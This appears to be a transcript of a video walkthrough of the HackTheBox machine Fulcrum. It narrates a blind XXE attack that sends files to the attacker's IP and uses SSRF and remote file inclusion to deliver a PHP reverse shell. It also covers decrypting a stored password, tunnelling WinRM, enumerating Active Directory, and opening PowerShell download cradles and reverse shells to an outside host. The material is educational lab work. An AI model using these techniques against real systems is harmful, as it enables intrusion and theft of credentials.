What's going on YouTube? This is IppSec and we're doing Fulcrum from HackTheBox, which is going to be an extremely tough box. This is probably the hardest HackTheBox machine that has been launched, and that's why this image on the machine is just not really anything special. I didn't spend much time creating the graphic because I need all the time in the world to go through this box. It starts off with a XML external entity that is a blind attack, and that will gain you shell if you chain it to a PHP application listening on localhost through like server-side request forgery. Get that shell, and then there was a unintended privesc on the box that came out eventually with some kernel thing. We go over that in the end of the video. That makes it a bit easier if you do that. Essentially, you can pop root on the very first thing, then read the hard drives of every other box and get the flags that way. That's the easy way. The hard way involves a lot of work. So let's see. It starts off with doing some type of pivoting into Win Remote, and in order to do that, it's you pretty much got to use the Ruby package manually. Metasploit, crack map exec, and Python didn't work. PowerShell on Linux didn't work. You could tunnel it to a Windows machine, then do NOPS session. That is the easiest way to do it. But WinRM, the Ruby module, works. Big thanks to Alamot for finding that, or I don't know how you say his name, Alamot. Anyways, get a shell on that box, then you got to do some Active Directory enumeration, and it's a pain because the box you're on doesn't really have firewall rules off, so you either got to get PowerView on the machine to do it, or do manual LDAP queries through PowerShell to enumerate users. Once you do that, you get on a file server, which then you enumerate a bunch of login scripts, and eventually get a domain admin password. At least I believe that is the whole chain. We'll find out. Let's just jump in and do this box. The very first thing we'll do is the nmap, so nmap-sc for default scripts, sv enumerate versions, oa output all formats, put in the directory nmap initial, then the IP address of Fulcrum, which is 10.10.10.62. This does take some time to run, so I've already ran it. Looking at the results, we can see that Nginx 110.3 is running on port 4, 80, 88, not 9001, 9999, and that is about it. It is a Ubuntu box, as everything does have a Ubuntu banner, and we're running OpenSSH 72p2 for Ubuntu 2.2. I think if we Google this, we could find the Ubuntu distro, so if we search that, we may have to turn uh, intercept off. Let's just put that in Google. I don't know why I copied HTTP. Let's see if that finds anything. Okay. So Launchpad does have it, and we'll see exactly what Ubuntu version this is. It looks like it is going to be Ubuntu Xennial. Not 100% positive about that, but that is our best guess. Doesn't help us, so let us begin enumerating it. And while we enumerate, I'm going to do a second nmap -p-, and we're going to put that also in the nmap folder. We'll call this all ports 10.10.10.62. Let that go and begin looking at it. So let's look at port 4. Go here, 10.10.10.62, port 4. We see it says under maintenance. Look at the page source. We see the link. We can just click the link and see what happens when we click home. Nothing really. So, this is very much like Crime Stoppers, how that whole thing worked. If you want to kind of see the source code, I recommend looking at that video. But what I'm going to do is try home.php. And if I get a page back, I'm going to assume that it is appending .php to things. And there we go. We do get the page. So I'm assuming this is like an include statement, and it's including page and then appending .php. So that's why I tried home.php. We get a file upload form. So let us just try going to Documents, HackTheBox, Boxes, Fulcrum, and we'll just upload an nmap thing to see what happens. upload image, and we get upload failed. So we could try putting a bunch of image stuff in the file in case it's checking for an image, but I'm going to spoil it. It is not. If you want to, I think it was Popcorn, one of the earlier videos, I go over a lot of that. So we do know there is a home.php, an upload.php, and an index.php. So let us go to Cherry Tree and actually keep track of this box in note form because this is a complex box. So I'm going to add a child node. We'll call this, let's see, host, because there's going to be VMs on this box. So I'm going to call this web. And then this will be port 4. And this will have potential. We can make this a bit bigger so you can see. LFI, RFI on 10.10.10.62 / index.php page equals poison. So that's one thing on the thing. There is a index.php, home.php, and upload.php. And I think that is all we know. So if I hadn't done this box before, this is where I would start a doorbuster up and putting the .php extension and saying what other things are there. I'm not going to do that because you've seen me run GoBuster probably around 50 times, so you should have the hang of that tool and be able to do that. And we will progress on to the next port. So port 80, the actual website. And we just get an error message. This is interesting that it's giving us a Microsoft.NET error message. Going into our Nmap, we see the header is actually Nginx on Ubuntu. So we know this is some type of rabbit hole or something because there's no reason why a Ubuntu server would be throwing IIS errors. So let's add a port 80. And this is going to be okay. So let's check the next thing, port 88. phpMyAdmin. We can try admin, see if we get in. Bunch of error messages. So it looks like even if we had the correct credentials, we probably wouldn't get in. So let's add that. phpMyAdmin. Okay. And let's see, the next port was 9,999. pfSense, admin, doesn't get in, admin pfSense, doesn't get in. So going back here, that was quad 9, pfSense, and if you remember doing the box sense, pfSense by default locks you out after trying a bunch of things, so we're not going to bother brute forcing this because it probably does have some type of lockout. So let's go to the next thing. That is it for that one. But on the Nmap with all ports, we have 56423. So let's check this one out. We get something weird, a response back. Nothing really in page source. So let's go over to burp, turn intercept on, and see what this is. that is pfSense, I think. No, that wasn't. It's got a lot of weird cookies, that's what I thought. I guess just because we hit all the pages, it added cookies. So send to repeater, click go, and we can see that the server has a unique header. Everything else says it's Nginx, but this one says it's Fulcrum API beta. So that one thing being unique about it is what's going to clue me in and start testing it. So let's put that in the notes. And normally, I don't do cherry tree in videos because they're rather straightforward, but you'll see as we progress through this, having notes is definitely going to help. So, let's see, can I rename that real quick? I'm sure there's a rename. Is it F2? There it is. And I'm just going to make a new one. Ports. And we can move all these in here. Okay. So this is server header is unique, Fulcrum API beta, or something along those lines. And let's play with this. So let's send this, and we don't get anything different. We can get rid of these cookies because this is all PHP myadmin, PMA, PHP myadmin, PHP session. Don't need those, so let's just clean that up. If we try changing these variables, let's try ping ping, ping who am I. Nothing really happens. But this is an API, so one of the things you generally should do when you fuzz APIs is change the where you're inputting data. This is common in like NoSQL databases when you give it regular plain text stuff. So if this was heartbeat ping is equal to Pong, or it's going to be something like that, then you change it to JSON, you may be able to do weird things that it didn't expect because you go down a different code path. So we're going to try changing this to XML requests because XML are generally pretty buggy. So let's see. Where's content type? Is there one? Except doesn't look like it. So let's change this to XML. So heartbeat. Then we can do ping. We'll do Pong because that's what it is. Slash ping. Slash heartbeat. And we can make this a bit prettier because make it easier to read. So send this, nothing really happens. We can change it to ping. And we do get a slight change on heartbeat. And now it says ping ping. So that is a clue that this is going to be cross-site, not cross-site, XML and the injectable. And also if you didn't want to do this, if you were just completely fuzzing it, I think Burp or some automated scanner may pick it up because if we go, let's see, let's turn intercept off. And let's see, I think it's GitHub payload all the things. Yes, this is a really good GitHub repository for a bunch of quick proof of concepts. And you could see there is XML entity injections, basic PHP wrappers inside of it, denial of service, blind. So this is what you want to do. And we're going to do one of those real quick. And we're not going to put any real data. We'll just say XML version equals 1.0, encoding equals UTF-8, Okay, that's the header. We'll do doc type foo element foo any. Okay, the next line is going to be entity cross-site scripting, and these foos and this XXE are names, so they don't really mean that much if you're trying to make sense of it. And then we can do HTTP 10.10.14 and my 30. I am 30 slash, we'll do this on port 9001. And we'll say, go to the URL or URI, please subscribe. Okay. Then all we have to do is put some type of variable so it calls XXE. So we'll call IppSec, then and XXE semicolon IppSec. If I type that all correctly, it will hit my web server on port 9001. So NC LVNP 9001. Go. We're not getting a response back immediately. And we get the connection. And we see it did go to please subscribe. So if you just ran some type of web scanner, chances are it would pick up XML any injection if it was checking for it. It's a bit hard in the HackTheBox lab because Burp Suite will do Burp Collaborator, which goes to the cloud, but these servers aren't connected to the internet, so I don't think that will work. So that's why I did this all manually instead of doing like Burp Suite Collaborator. Of course, Burp Suite Collaborator is also a paid feature, so that is how to test for XML any injection. If we wanted to, we could also do cool things like create a transform file, which will allow us to read files off the server. We can also get to code execution eventually, but let's do reading a file first. I'm going to copy this, go to Cherry Tree, and we'll put XXE blind POC, and I have an R at the end. I don't know why, but there we go. And create a new tab here, call this blind POC, call this file read. And in order to do this, we're going to have to do a blind method. If you didn't catch me do it earlier, it's blind because if we do heartbeat ping IppSec slash ping slash heartbeat, we still get ping pong. If this is changed to ping with a capital P, we get the output differs. If we put anything else, ping with a lowercase p, it's going to say pong. So we can't really control anything. If this wasn't blind, we'd be able to do like that and XXE semicolon, and then the output would have came here. But because we can't see the output, we have to do a blind method. The blind method that is the easiest is making the server make an HTTP request to us and sending the data in the URL. So that's what we're going to do. And in order to do that, we have to make a quick change here. So we put a % before that XXE. We're still going to make a request to our server because in order to do this, we have to do an external entity and create a transform file. So we'll just do transform.xml, and we also have to pass a few parameters. So this will be %xxe, and then param1 we'll call this. Then that, and this will be called the file. So if we make this request, it's probably going to go to a web server and then not do much else. So if we do 9001, we're listening, click go, it hung, and it makes a request to transform.xml, which we have to create. So let's make a directory called www, and then v transform.xml, And this one is going to be entity percent, if I could type, oh my god, there we go, data system, and I'm going to do the PHP filter. When we went to payload all the things, it showed that we could, and the reason why is we're putting this in a URL, so it has to be all good characters, can't have a lot of weird things, so doing the PHP filter. And the resource is going to be, let's do XXE passwd, and that's it for that line. Now we have to do entity. My fingers forgot where percent is. Param1. And then entity XXE. No, this is the file. System. HTTP. There's no way I'm typing this correctly the first time. 1430 9001 slash, we'll just do percent data. And if I type this all correctly, we will see two different requests. First, we will see the server pulling transform.xml, then we'll see a bunch of base64, which will be XXE passwd. So let's see. Where do I have the file? I think this shouldn't be the file, but we'll click go. No, this should probably be XXE. Or, trying to think. We'll try XXE, see what happens. Nothing, it's still getting transform. So let's cat transform.xml, and let's make this, is it data we want? Nope, not data. Let's see, what are we doing? Creating the document, creating the entity XXE, then system, transform.xml, then we're sending XXE, then sending param1, and that is going to transform.xml, and that is going to be entity data system, grabbing the file there. Oh, I don't have a double quote. That needs a double quote. And then let's see, param1 data. Click go. Took longer. Still did not do it. So let's see, entity, then param1 entity. Oh, the file. That's what we called it. So right here, this is the variable we want, is the file. Because when we call this, it's going to call that out of the transform piece that it pulled right up here. So click go, click here, and we have a bunch of base64. There we go. It couldn't find the file, but if we vim passwd.b64, paste this, base64-d, we get everything. So let us create a Python script to make this a little bit more manageable, because if we want to pull a lot of files, then we can't really do that because we have to keep editing by hand. So let's create a new script called XXE.py. And we're going to start this off with user bin environment Python, and this is going to be Python 3, so we'll do from http.server import base http request handler http server from base64 import b64 decode, because we have to decode from the URL. And then we got to create the HTTP class. So class HTTP request handler base HTTP request handler. We just imported that up here. And then we can do a definition. Do get is, I think, what it is. And to test this out, we're just going to print self.path. And that'll be it for that. And finally, we just have to run the program. So def run. It automatically indented for me. Print starting server. Server address is equal to, we'll listen on all interfaces on port 9001. And HTTPD is equal to server address request handler serve this forever, and then we can just run. So if we do Python 3 XXE starting server, we're listening on port 9001. So if we curl 127.0.0.1 9001, put anything there, it's just going to print everything we send it. So the reason we do that is because now we can create custom pages. So this very much follows along like a web development path. And the reason we're doing this again is just because the server makes a request to us and that file changes. It's that transform file that keeps changing, and instead of making a bunch of files on the box, I'm doing this all dynamically. So the idea is going to be the request is going to look like stage a number, so stage 1, and then do a question mark, file name. So let's see. Then we can do stage 2, file contents, and then all else give me shell. So that's the logic of this program. So those comments are pretty ugly, so I'm going to remove them. We'll say stage comma data is equal to self.path.split, and we're going to split on the question mark. So that means everything to the left of the question mark is going to be the command. Everything to the right is going to be the argument. And that's exactly how web pages work. So if stage is equal to stage1.xml, and we have to put that slash in, then we are going to do message is equal to, and let's exit here, split, wrong split. Split this way so we can copy and paste better, and we wanted to grab www, and did I delete the file? ls. Maybe I deleted the file, or I was in a directory, I don't know, because I could have swore I had the... Oh, did I do a transform file? I swear I did a transform file already, it just disappeared. We'll retype it. So, entity, %, data, system, PHP, filter, convert, base64-encode, resource is equal to, we'll end this, and we'll plus data, and that is grabbed up here. And then plus triple quote to go back into adding a string. And then we want a single quote and that. And then the next line we want entity percent param1 entity, and we'll call this I guess I'll call this xfill. I think this was the file last time. System http 10 10 14 30 9001, and this will be stage2.xml percent data and single quote that end. Okay. Then we just need to print. Do we want to print data? I don't think we want to yet. Now we can do if stage is equal to stage2.xml, and we just want message is equal to nothing, print b64 decode data.decode utf-8, because this is Python 3, and everything I think would be UTF-16 or something weird. Then after this if-then statement, we want to do self.send response 200. This is send an HTTP 200. Then we got self send and headers. Okay. Then we can do self.wfile.write bytes message UTF-8. And this is writing it out to the actual console or the web server, because we have to write this message to the web server, and that's what this WFile stuff does. And that may be good if I did everything correctly the first time, which everyone knows probably isn't the case. So we started the server. Let's go to boot. And we can change this to be, let's see, stage1.xml etc passwd. Click go. And it did not work. Big surprise. I don't know why I got rid of that, but oh well. 127.0.0.1 9001 stage1.xml. Empty reply from server. This needs two things. Okay. Do we only get one line? No, we get two lines. So let's see. Entity, percent data, PHP filter. We got the quotes on both ends. That looks good. Oh, we changed the name from the file to xfill. I don't think that was it, but we can try. Okay, so that has been fixed. Then the next thing we do is, let's see, entity, xfill, system, 10, 10, 14, 30. That's my IP, 9001. That looks good. Stage 2, that looks good. Then single terminates that. Then we get this terminates that. Double quote terminates that. And this terminates that. That looks good. So let's see over here. Maybe this is where a mistake is. We make the request to stage 1 XML, XXE pass WD. So let's print that and make sure. Oh no, we don't have to print data because we know the data. Data's right there. So it definitely should grab that. So let's see. I didn't save it just grabbing the file without doing this because I didn't take that note. Awesome. We just had the blind POC. Let's go back here. Curl. We don't have any server headers. I wonder if that could be it. Like, here's the header we're sending. Whoa, no. Don't do that. There's the header we're sending. And then we literally just send data back. So, let's fix that. XXE. Let's see. We have headers. Is that what we need? Okay, we have a 200 response back. Let's see if this now gets it. Go. There we go. Except it's a little bit ugly. So let's see. We need a new definition to change how we do logging. So def log message cell format args, and we want to do nothing, just return. Click go, and there we go. We can get files off the box. So let's see, what happens if we just specify a directory? So if we just do /etc, is it smart enough to pull directories or not? It is not, it errors. But we could try, let's see, etc lsb release. That's a Ubuntu file. And it looks like it grabs it 3 different times. But you get the point. So that is the Python script to do XXE. So now let's dive into doing the actual code injection. And this comes with a little bit of knowledge and guesswork based upon the upload. So remember when I did this page? We get under maintenance. And if we do an RFI type attack, so 10, 10, 14, 30, we'll say 9002. It just says under maintenance for us. But if we go back into burp, and we'll do, actually we can do the blind POC. We can say, let's see, we can try a server request forgery attack. So if we copy all this, go back to blind POC, do, get rid of this, HTTP 127.0.0.1, port 4, and then index.php, question mark page, and then our URL. So now the XXE is going to force the server to go to localhost on port 4, and it's going to tell the server to try to go to us. So we'll see if this has a RFI. So let's do netcat lvnp 9002. Click go. We did not get anything back. Let's see, do we have everything right? Is this all in one line? That is 127.0.0.1.4 index.php page is equal to that. Maybe we can do /test because it appends.php. So what probably just happened is it did that, which then no longer returns anything. So we'll try this. Click go. We don't get a response back, and we get a request to IP. So now we can include PHP files. So if this 9002 was hosting a PHP script, it would then execute. So let's go back into a Python script and add PHP logic. Okay, so let's see. Let's add a try. So if we do try, and then let's do QA 1, 2, 3, 4. At A. Shoot. QA 1, 2, 3, 4. Let's get out and redo this because I screwed up my macro. So let's see. Try. Then. Okay, sweet. QA, insert 1, 2, 3, 4 spaces, go down a line, and hit home. Escape and macro, and we'll say this for the next 5 lines. So 5 at A. There we go. We just need 2 more, so 2 at A to do those. There we go. And 1, 2, accept. And this is going to be our PHP code. So message is equal to some PHP stuff. Let's see, where is it? Op shell PHP reverse shell. You can just go to Pentest Monkey, it's here. Also, if you do a locate on your Kali box, this file I think is stock on Kali. I just moved it because it's in a weird folder. It's in sec list. There it is. It would be here on your box. So let's see. Let's edit this. We don't need all these comments. Okay, let's send the shell to port 9002. Okay. Let's cat that file, pipe it to xclip to put it on a clipboard. Did I spell selection right? I think I did. Okay. Set paste. It's not the right clipboard. Hold Control and paste. There we go. And that'll probably do it. As long as I didn't make an error coding, which, again, it's bound to happen. So, let's do Python. And we will say nc lvnp 9002. Okay, we can go here. And we just got to make the script error out. So we can say this file read. Send me shells. And since I don't have a question mark, it's going to error when it splits, which goes to the accept, which then sends the PHP code. And that did not work. Not one bit, actually. That works. That does not. So let's go here and see what happened. So whenever we hit this accept, let's print a message. Error. Sure. Click go. So we hit message. I wonder if we can't send... No. That should be right. Everything looks like it pasted correctly. 1010 1430 for 9002. Oh crap. I know what we did wrong. We should go here. If we just do shells here, it should work. We're not doing the whole local file include. There we go. That was the issue. Wasn't doing local file include and still aired out. And my box is, there we go, was hung. Well, this isn't off to a good start. Go here. We make it trigger the RFI. 9001. I reused a port. There we go. Finally, we have a shell. So we're now on Fulcrum. If we do who am I, www data, uname-a, Fulcrum. So let's get a real shell. Python-c import pty pty.spawn bin bash. Forgot a single quote. There we go. So sty raw minus echo foreground export term equals screen, and now I can clear. So the first thing I want to do is run LinEnum.sh. So let's copy that here. Opt Linux privesc linenum.sh. We'll copy to www. Go in that directory and Python m HTTP server port 80, and we can curl 1010 1430 linenum.sh and pipe it to bash. While this finishes running, let's just go to the top. We can search for what was it? Call space. There we go. So we can see this box was built in 2017. It is Ubuntu Xennial, so we were correct there. 1604. Host name is Fulcrum. www data. This may be us. I don't think it is. Probably is, actually. We have a user called Blueprint who logged in from 10.10.14.2. Other users in the box. We'll be able to go into Blueprint's home directory, so that is something we should check out. It looks like we've already looked at it, and nothing too interesting there in Blueprint's home directory. This looks like ver.dub.dub, which is probably my home directory since that's the user I am, and we have API, PMA, and uploads. Guessing uploads is on port 4, PMA is that PHP myadmin, and API is the thing we are fuzzing. Cron, not too interesting. Network. We have a lot of interfaces, and these don't really have IP addresses. We have 192.168.122.1. Then a bridge, bunch of different VNets. So something funky is going on in this box to have a lot of VNets. Then we got web, webnick. Let's see what else is there. Webnick. So this guy talks to a box on 192.168.122.228. It's pointing to Google for the name server. Engine X running on everything. Running processes. Whoa. So this is interesting. We got running process of libvirt, firewall, web, DC, file. So we got a bunch of VMs running on this. And we should have like the VMDKs here. We can see if we can read to them. But if we had a privesc on this machine, which we do, we'll get into the end of the video, the unintended method, then we could just pull the flags off the VMDK files. But let's go back to Cherry Tree, and this is why I was making sure I took notes on this box, because this is where it gets interesting. We don't want that there. We can move this to host. So we got the firewall, we got DC, we got web, I think. Is that Windows it was running? Yeah. Then we got, let's see, firewall, DC, firewall, DC, file server. It's here. We can rename web to be VM host, DMZ, lol. Normally it's not smart to run your hypervisor on the first thing you exploit, but let's see. And that's that. So let's go and poke around the server. And looks like my shell died. That shouldn't have happened. Netcat on 9002. Maybe the box got reverted. Let's see. Python 3, XXE.py. We need to listen on 9002 real quick. So let's organize our terminal real. This will be called HTTP, and this will be VM. Nine 9001's in use. Because of that, it's 9002. Click go. Got our shell again. I probably click cancel and burp or something, and that's what did it. So Python C. Okay, so let's go poke around. Check home. I think we did this in the privs checker, but look at files, nothing there. Let's go to var www html, nothing there. Find API, type F. We just got one file there. PMA is probably going to have a lot because that's PHP myadmin. It's weird that it's dying. Let's see. Get another shell. It does time out. Should be a way to move off this, but I'm not positive. And bash. Okay. Then let's do foreground. Okay. Export term. It's getting really annoying, so let's see. tmux new. Fulcrum. tmux exits right away. We can do screen. Okay. Var www. If we go to uploads, we do have a PowerShell file, fulcrum upload to corp.ps1. So let's see. To do for the PowerShell remoting port to the external interface, and the PowerShell password is now encrypted. So this is just a PowerShell secure string, and we got both the password and the key, so we can decrypt this. Let's see. Copy this. And there's something interesting with PowerShell on Kali right now. So I'm going to do PowerShell right there, and then I'm going to, export? Oh, I don't have that option anymore. PowerShell is going to crash very shortly. And you have to disable the telemetry to do it. So let's see. PowerShell Linux, disable telemetry. And the reason is there is some crypto library that is mismatched, and when the telemetry thing times out or activates or does something, it segfaults PowerShell, which is really annoying. Let's just try the GitHub page. GitHub, PowerShell. Let's see, is it here? I don't want to do find. Search for things on this page. There we go. We need to create this variable. I bet if I go back to my console, PowerShell has already crashed. Unless an update fixed it, and I just wasted a bunch of time. Nope, segmentation fault. So, if we set that equal to 1, and then do pwsh, that top one's going to crash shortly. What do we want to do? Go to the DMZ. I want to grab all this stuff. Paste this in. 4, okay, we got the secure string. And now we got to decrypt a secure string. So if we just go to Google, PowerShell decrypt secure string. Let's see, one-liner. I like one-liners. Let's see. Copy this. There we go, segmentation fault at the top. It did not like the paste, whatever I try to paste. There we go. This, if we make this 4, we get management pass. So there's the password. Go to cherry tree. Let's see. Put the password there. Go back to the DMZ. And let's see. Do we have a host name? We do. There's the computer. Upload. It's trying to connect to. And the username is WebUser. So if we do an ns lookup on upload fulcrum.local, not found. Ping upload fulcrum.local. Doesn't look like we can resolve that host name. So if we just look at the IRP table again, we're going to try this IP address just because, well, nothing else to do. So put that IP there, and we'll have to do some type of scan on it. So let's see. Nmap static binary GitHub. That's what I want. Guessing this is 64-bit. It is. Save. Go back to HTTP. Wrong split. That should listen in dub, so I don't expose anything I don't want to. And now we can copy Nmap and then download Nmap. 10.10.14.30. Make it executable. And then we want to grab that IP address. And to save time, I'm going to search the ports. I know it's within the 5900 range. This is going to be a Windows remote management thing. So let's see. If I do V as this runs, I can increase the verbosity, and that will tell me whenever it hits an open port immediately. So we can get port 5986 is open, and this is WinRM encrypted connections. 5985 is WinRM decrypted, or basic authentication. So we need to do Windows Remote Management, and unfortunately the encrypted piece, I had problems doing it with pretty much everything but Ruby. Talked with a guy on HackTheBox, Alamot, A-L-A-M-O-T, and he helped me out with finding a good Ruby thing, because the way I did this when I first did the box is I just created a port forward back to my Kali box, loaded up a Windows VM, and did NOPS session and did this stuff from Windows. But we're going to do it all from Linux because I don't want to load up Windows. So we're going to go to a cool GitHub page, Alamot Code Examples GitHub, I think. That's not it. Code something. code snippets. So if you clone this repo, there's going to be some WinRM things you want. So we'll call this WinRM. And we're going to CP those out of the opt because we're going to edit them. So if you go, let's see, opt, code snippets, WinRM. And this is just based upon, if you go Google Ruby WinRM, the code's going to be almost identical. There's a few quality of life things just to make the shell and file uploads a bit easier. But let's see. Do they have an example or show anything? Yeah, so here's the code. And then if we go in cat WinRM shell, you can see it's almost identical. So let's edit this. Whoops. Username. This is WebUser. The password. This. Okay. IP and port. So we're going to have to do a port forward because we can't reach the 192 subnet. Oh no, that was bad. So I did 127.0.0.1, which is myself. We'll do port 5986 still. And then let's go and do a reverse shell. So first things first, v etc passwd. Let's give my IppSec user no shell. So if someone goes on that, they can't just run commands on my box. SSH, we'll do -r for reverse tunnel. And then 5986. And we want to send stuff to 192.168.122.228, I believe. 122.228, yep. 5986. And then our box, which is IppSec, and then 10, 10, 14, 30. Okay. We gotta start SSH. Log in. Okay. Cannot chdir. Maybe I need the -n if I do. Whoa, that's ugly. There we go. Need -n to not execute commands so that shell thing doesn't work. But if I do netstat alnp grep 5986, I am listening. And if I curl 127.0.0.1 5986, it's going to go through. So 5986 is listening on my local box, and it's going to hit this SSH on the very first Fulcrum server. That's going to direct it to this address, which is the IP address of, we don't know the host name yet, and 5986, which is the WinRM port. So now I can just do ruby winrm shell.rb. If you get any error messages, you can just do gem install and then the package that's missing. And we are now on the web server. So on a Windows box, we're running as the user WebUser. And let's see. Hostname, WebServer. So I'm just exiting out. We'll move to 3, and we'll rename this to web. And now let's log back into this box. So Ruby WinRM shell RB. So we do dir, and we see right off the bat there is a user.txt file. It's not 32 or 33, so I'm just going to look at it, and that's the length, and we just see you need to go deeper. So we still don't have the user.txt flag, and we've popped two different boxes. There are two files on this box. There is invoke psexec and check fileserver.ps1. So I'm going to look at check fileserver.ps1. And let's see. Waiting for IT to give me the address. It's getting credentials. And nothing. So let's creds. Let's look at invoke psexec.ps1. Are the credentials in this? Nothing at the bottom. And doesn't look like we have any credentials here. So let's keep poking around the box. Let's go to the desktop. psexec is on it. We were just in documents. Let's look at downloads. Nothing there. What is on this box? It is a web server, so I'm going to look in inetpub. Let's go to www.root web.config. And let's see. We got a host name, the domain controller dc.fulcrum.local. And we have a password and a username. So this is going to be probably a low privilege user with LDAP privilege, or not LDAP, just like bind privileges. Domain users can search Active Directory for a bunch of things, and we could do a bunch of LDAP queries manually, but I like using PowerView in this case. So I'm going to, before I exit, let's just copy these creds. Let's see. Let's see, we got fulcrum.ldap and password for searching. And I know this cherry tree isn't super organized anymore, but oh well. DC fulcrum. Okay. So we'll exit out of here. And we're going to do WinRM shell with upload. And before we do that, let's copy PowerSploit real quick. What's it? CD opt. Where's PowerSploit? It's in PowerShell. So cp opt PowerShell PowerSploit. And we want Recon. We could do like power up and all that stuff, but I just want to connect and see what is an Active Directory. So copied PowerView. So this time I'm going to do that WinRM with file upload, so we can upload the file. So we can copy our config. I forgot to set paste. Okay. So we can execute this. Then we can just do upload PowerView.ps1 to c:\\, what is it? Users, WebUser documents, think. Okay. Now we can do import module PowerView.ps1. So this allows us to do a bunch of just cool commands. So we can do get domain user. I think that's it. Oh no, we have to do credentials first. So we gotta create the secure string. So the password will be secure pass. And then we convert to secure string. The password was password for searching. Then as plain text force. Then cred is equal to new object system management automation ps credential, the username, which is Fulcrum /LDAP, and then the password, which is that string. Okay. We do cred. We have the username as LDAP, and the password is our secure string. So we should now be able to query the domain. So if we do get domain user dash credential cred dash domain controller dc fulcrum.local and do enter, should start doing something. Maybe. And there we go. It's dumping a bunch of the records in Active Directory, and I forgot there is a lot more than you'd expect. We have a lot of user accounts, so let's see. I can pause that output and we can look at it. Get domain. There we go. So the administrator account has a login count of 29 times. His last pad password was in 2017. It's a normal account. Password last set. So you can see it pulls a lot of information from this. And there's a lot of, I guess, fake accounts in here. So if we do same account name, we get an account called 879F. Another one probably. Where is it? 97F0. So there's just a bunch of bogus accounts. So I'm going to Control C out of WinRM, and I'm going to redo that. I don't have my up arrow, unfortunately, so let's retype everything. What do we have to do? Import module PowerView.ps1. Then sec pass is equal to convert to secure. I wish it was a bit shorter to type than this every time. I think that was the password. There we go. New object. Okay. So get domain user dash credential cred dash domain controller dc.fulcrum.local. We're going to select SAM account name. And what other fields do we think we want? Probably logon count. And last logon. And maybe member of. Let's just do login account and member of. Oh, not login. logon count, and last logon. This should be a bit more manageable because it's not dumping like 15 fields per user. And once this finishes, and we have an error message. I mistyped the domain controller. There we go. And now, maybe once this finishes, we'll find out if I can type. I wonder if PowerShell's case sensitive because I have a capital C in cred. Nope. It is now outputting all the users, the number of times they've logged in, and the last login time. If that's correct, because, yep, it is, because we have one semi more recent. So let's see, get domain, go to the top, highlight everything, enter, v domain logins, last logon, we'll call it, paste it, and we can cat that, and then grep-v 1601. We don't care about anything that hasn't logged in before. So we just got a handful of accounts now. So we went from 1,400 accounts to 20 accounts of interest. And there are times when these would be interesting. Like you could try spraying password against all these accounts, because if they're active and haven't been logged in, then maybe it's still set to a weak password. But let's see. The accounts of interest are going to be, of course, administrator, B tables, because he has a high login count, and probably 923A. So let's copy all this. And let's see. We'll just put it all on one, and I can deal with organizing later. There we go. So let's look at B tables first. Going back to our WinRemote session, we can do the, let's see, get domain, copy this so we make less typos, paste, and we can just do B tables. And this should pull all the attributes for the B tables user, so we can see exactly who this is. So the bad password time, last time in 2017. He has login rights to the file server, it says. His name's Bobby Tables, and one of his middle name is Drop. The info tag says his password was set to file server login 12345++. So let's see. Probably file.fulcrum.local, just guessing. Fulcrum B tables. Okay. So we can copy this. And then we have to do the password thing again. So we can do BT pass for B tables is equal to convert to secure string as plain text force. Okay. Then we need to do cred class equal to object. Okay, and then the password is btpass. Cred. Looks good. So let's do enter ps session computer name file fulcrum.local credential cred. And it says we're currently in a Windows PS session and cannot use enter PS session on another PS session. So you can't do nested PS sessions, but we can probably do invoke command computer name file fulcrum.local credential cred, and then script block hostname who am I. Let's see. Probably have a typo somewhere. Computer name file.fulcrum.local credential cred. Script block have to have a space. There we go. So maybe it has to have a space or it didn't like that semicolon. But we have successfully ran a command as btables. And if we copy this and do a host name, it is on the file server. So let us get a shell. So we can do www. We'll use Nashang because, well, it's what we always use for reverse shells when we don't want to do Metasploit or Empire. Nashang. And then let's see. Shells. Invoke. Let's see. PowerShell TCP one line .ps1. Okay. Just says uncomment and change the IP. So we'll try this one. And we'll do 10, 10, 14, 30 on port 9005. I forget what the last one I left off on was. Cat. Copy. NCLVMP 9005. Invoke command. Computer name. Go here. And we don't have anything back. So I'm going to wait for this to terminate. Because if I Control C, I'm going to kill WinRM. And if I kill WinRM, then I got to type all that fricking secure string stuff back. And it turns out I have to type all that secure string stuff back. So let's see. Paste. And paste. Okay. So it didn't reach out to my box, so maybe my first thought is the reverse shell is bad. So we're going to do invoke command, computer name, and it's going to be file fulcrum.local -credential cred script block ix new object net.web client download string 10.10.14.30 please sub kill the script block, go over to HTTP, and we're not getting anything. So the box probably can't talk to us, which is unfortunate. So start this up again, and we're going to do something slightly different. So we're going to create a for loop and just do some common ports and see if anything talks back to us. So in order to explain that, the best way to do is we'll do 1, 2, 3, 4, pipe that, and then do right host $_, and then end that. And you can see that essentially was a shorthand way to write a for each loop, or a for loop. So what I'm going to do is do, let's see, common ports. So we'll say 22 for SSH, 53 for DNS, 80, 443, and let's see, 445. Some common ports. And then we're going to pipe that and do test net connection, computer name, 10.10.14.30 dash port, test all the ports, and I screwed that up. I need to do that first. Dash port. I should be running this in the script block, my bad. So we can copy this. And then let's do the script block. So invoke command, computer, file, Fulcrum, local, credential, cred, script, block. I need double. And then let's open up Wireshark so we can see if anything talks back to us. So ton 0, move this up. We want IP.port, oh no, IP.address is equal to 10, 10, 4, 10, 10, 10, 62. Okay. Let's see. Hopefully that command's correct. We got a lot of SSH, so we'll do and not TCP port equals 22. Which is probably going to make it so we can't see if the server actually reached back on SSH. So that very first port we're checking, it's kind of a moot thing because, yeah, we just filtered that out. So let this run, and we'll see if we get anything back. We see that we got TCP port 53 back, so we can talk to our local box over DNS. So let's go here, and let's see, v invoke one line, and we'll change this to be port 53. We'll call this one file. Close out of that. We gotta do the shell again. So let's copy. And copy this. And then we need one last one. Invoke command. Copy up to script block. Okay, then we want to paste a shell on port 53. CLVNP 53. Paste. Ah, it had a fricking character return at the end. Thankfully, WinRM didn't die. Paste. Go to File. We get a connection back. Do hostname. And we're on the file server as btables. So let's look at what there is. Nothing in directory. Do dir, we get a bunch of files. And I don't think these were supposed to be here, but they're from October 2017, so I guess they got left in. So we'll play with them. The intended way, I think, is to look at NetLogon. So if you did like a netuse, what is it? dc.fulcrum.local. I need z colon or something. dc fulcrum.local/netlogon, and then I think it's /user. Is it colon? Fulcrum. Was it btables, and then file server logon 1 2 3 4 5. I think that's it. Then error. If we do z colon, didn't map it either. Let's try that again. Did I type netUser instead of netuse? No, I did netuse. Let's see. Where was my mistake? Let's just try using backslashes. I'm going to copy the password because that's a bit pain. I can copy all of this. Let's put the DC in backslashes. Maybe that's it. Do netuse z colon, dc fulcrum.local, netlogon, and then paste all this. There we go. It had to be in backslashes. If you look at the netlogon, which is readable by domain users in Active Directory, because that's how group 